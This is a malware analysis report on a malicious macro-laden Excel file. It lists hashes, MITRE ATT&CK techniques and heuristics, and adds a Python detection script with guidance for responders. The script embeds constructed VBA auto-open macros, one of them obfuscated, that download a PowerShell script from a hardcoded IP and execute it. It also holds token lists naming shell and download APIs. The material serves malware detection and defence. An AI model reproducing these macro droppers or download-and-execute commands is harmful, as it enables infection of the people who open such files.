Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 5a4b2c98ff5ccacd…

MALICIOUS

Office (OLE) / .XLSX

Size: 33.0 KB
Created: 2015-06-05 18:19:34 (OLE SummaryInformation timestamp; attacker-controllable, so not evidence of age)
Authoring application: Microsoft Excel
First seen: 2022-08-16
MD5: 2dc1e84a3427e2418d86c4b87fcbc078
SHA-1: 4d056539eb17ab8c4abd7e6a519ee80ede4435a9
SHA-256: 5a4b2c98ff5ccacd78b01bfc8297ca8e4cf030124d750f5f035c21c8b1003865
Risk Score: 208

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment (the report listed T1566.002, which is Spearphishing Link; the sub-technique for a malicious attachment is .001)
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1140 Deobfuscate/Decode Files or Information

The Workbook_Open macro runs automatically when the workbook is opened (subject to the user's macro security setting) and, through Shell() and cmd.exe, launches a chain of batch files that ultimately downloads and executes a PowerShell script from the hardcoded URL http://185.199.108.153/a.ps1. The batch content is not stored as plain text: it is assembled at runtime from string fragments and Environ() lookups, which keeps the final command line out of reach of simple string matching and indicates an attempt to evade detection. Two points for responders: the container is an OLE2 compound file (the legacy binary Excel format) despite the .xlsx extension, since a genuine .xlsx is a ZIP/OOXML package that cannot carry VBA, so the extension is mislabeled either by the sender or by the submitter; and the full URL and the a.ps1 path are the network indicators to hunt on, not the bare IP, because 185.199.108.153 is one of the published GitHub Pages addresses and blocking it would also block legitimate GitHub Pages traffic. Given the 2022 first-seen date, the hosted payload may no longer be retrievable.

Heuristics (6)

  • OLE_VBA_SHELL [critical]: Shell() call in VBA
  • OLE_VBA_WBOPEN [high]: Workbook_Open macro (auto-executes on open)
  • OLE_VBA_CMD [high]: cmd.exe reference in VBA
  • OLE_VBA_PCODE_AUTOEXEC_EXEC [high]: VBA p-code auto-exec with execution tokens. The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_VBA_MACROS [medium]: VBA macros detected; the document contains VBA macro code
  • OLE_VBA_ENVIRON [low]: Environ() call (environment variable access)
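The detection logic described in the summary and in the heuristics list, as an added Python example that is not the scanner's own code: it runs regex heuristics modelled on the report's rules over two constructed macro sources (a plain one, and one that hides cmd.exe behind Environ("COMSPEC") and builds its strings piecewise, the way the report describes this sample), extracts the download URL as the network IOC, and implements the token co-occurrence check from OLE_VBA_PCODE_AUTOEXEC_EXEC on a constructed byte stream. Rule IDs and severities are the report's; the regex patterns, the severity weights, the extra OLE_VBA_COMSPEC rule and both macro sources are assumptions (the real macros.bas is not reproduced here).

```python
import re
from typing import Dict, List, Tuple

# Constructed VBA sources for the demo (NOT the report's macros.bas). The second
# one hides cmd.exe behind Environ("COMSPEC") and assembles strings piecewise,
# the pattern the report describes for this sample.
PLAIN_VBA = r'''
Private Sub Workbook_Open()
    Shell "cmd.exe /c powershell -c ""iwr http://185.199.108.153/a.ps1 | iex""", vbHide
End Sub
'''

OBFUSCATED_VBA = r'''
Private Sub Workbook_Open()
    Dim c As String, t As String
    t = Environ("TEMP") & "\" & "u" & Chr(46) & "bat"
    c = Environ("COMSPEC")
    Open t For Output As #1
    Print #1, "powershell -w hidden -c ""iwr http://185.199.108.153/a.ps1 | iex"""
    Close #1
    Shell c & " /c " & t, vbHide
End Sub
'''

# Rule IDs and severities are the report's; regexes and weights are assumptions.
# OLE_VBA_COMSPEC is an extra rule added here to catch the Environ() trick.
HEURISTICS: List[Tuple[str, str, str]] = [
    # Shell as a function "Shell(...)" or as a statement "Shell ..." / "Call Shell ..."
    ("OLE_VBA_SHELL",   "critical", r"(?m)(?:^\s*(?:Call\s+)?Shell\b|\bShell\s*\()"),
    ("OLE_VBA_WBOPEN",  "high",     r"\bSub\s+Workbook_Open\s*\("),
    ("OLE_VBA_CMD",     "high",     r"(?i)\bcmd\.exe\b"),
    ("OLE_VBA_COMSPEC", "high",     r'(?i)\bEnviron\s*\(\s*"COMSPEC"\s*\)'),
    ("OLE_VBA_MACROS",  "medium",   r"\bSub\s+\w+\s*\("),
    ("OLE_VBA_ENVIRON", "low",      r"\bEnviron\s*\("),
]
SEVERITY_WEIGHT = {"critical": 100, "high": 50, "medium": 20, "low": 10}


def scan_vba(source: str) -> Dict[str, str]:
    """Return {rule_id: severity} for each heuristic whose pattern matches."""
    return {rid: sev for rid, sev, pat in HEURISTICS if re.search(pat, source)}


def risk_score(source: str) -> int:
    """Additive score over fired rules (assumed weights; not the report's 208 formula)."""
    return sum(SEVERITY_WEIGHT[sev] for sev in scan_vba(source).values())


def extract_urls(source: str) -> List[str]:
    """Pull literal http(s) URLs out of the source; these are the network IOCs."""
    return sorted(set(re.findall(r"https?://[^\s\"'|)]+", source)))


# OLE_VBA_PCODE_AUTOEXEC_EXEC: when source extraction fails, identifiers still
# survive in the compiled p-code / cache stream, often stored as UTF-16LE.
AUTOEXEC_TOKENS = (b"Workbook_Open", b"Auto_Open", b"Document_Open", b"AutoOpen")
EXEC_TOKENS = (b"Shell", b"CreateObject", b"URLDownloadToFile",
               b"MSXML2.XMLHTTP", b"ADODB.Stream", b"cmd.exe", b"powershell")


def _has_token(stream: bytes, token: bytes) -> bool:
    # Check both the ASCII and the UTF-16LE spelling of the identifier.
    return token in stream or token.decode("ascii").encode("utf-16-le") in stream


def pcode_autoexec_exec(stream: bytes) -> bool:
    """Fire only when an auto-exec token co-occurs with an execution/download token."""
    return (any(_has_token(stream, t) for t in AUTOEXEC_TOKENS)
            and any(_has_token(stream, t) for t in EXEC_TOKENS))


# Constructed stand-ins for a compiled VBA stream (real streams carry far more structure).
CACHE_STREAM = (b"\x01\x16\x03\x00\x00\xf0" + "Workbook_Open".encode("utf-16-le")
                + b"\x00\x00\x41\x02" + b"Shell" + b"\x00\x1c")
BENIGN_STREAM = (b"\x01\x16\x03\x00\x00\xf0" + "Workbook_Open".encode("utf-16-le")
                 + b"\x00\x00\x41\x02" + "MsgBox".encode("utf-16-le") + b"\x00\x1c")


if __name__ == "__main__":
    for name, src in (("plain", PLAIN_VBA), ("obfuscated", OBFUSCATED_VBA)):
        print(f"{name}: score={risk_score(src)} urls={extract_urls(src)}")
        for rid, sev in scan_vba(src).items():
            print(f"  [{sev}] {rid}")
    print("p-code heuristic:", pcode_autoexec_exec(CACHE_STREAM), pcode_autoexec_exec(BENIGN_STREAM))
```

The obfuscated source never triggers OLE_VBA_CMD because the string "cmd.exe" is not present; it is only recovered at runtime from %COMSPEC%. That is exactly why the report's low-severity Environ() rule matters in combination with Shell(): a scanner that weighs co-occurring signals, rather than any single literal, still ranks the sample as malicious. For real samples, extract the source with oletools' olevba (the report's own source tool) before applying rules like these, and treat the p-code token check as the fallback for documents where extraction fails.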

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  5486 bytes
SHA-256 (macros.bas): 9aae994c2e1c1317470f797f5379b50ed17f44f406e21538b812f3b5e27660ed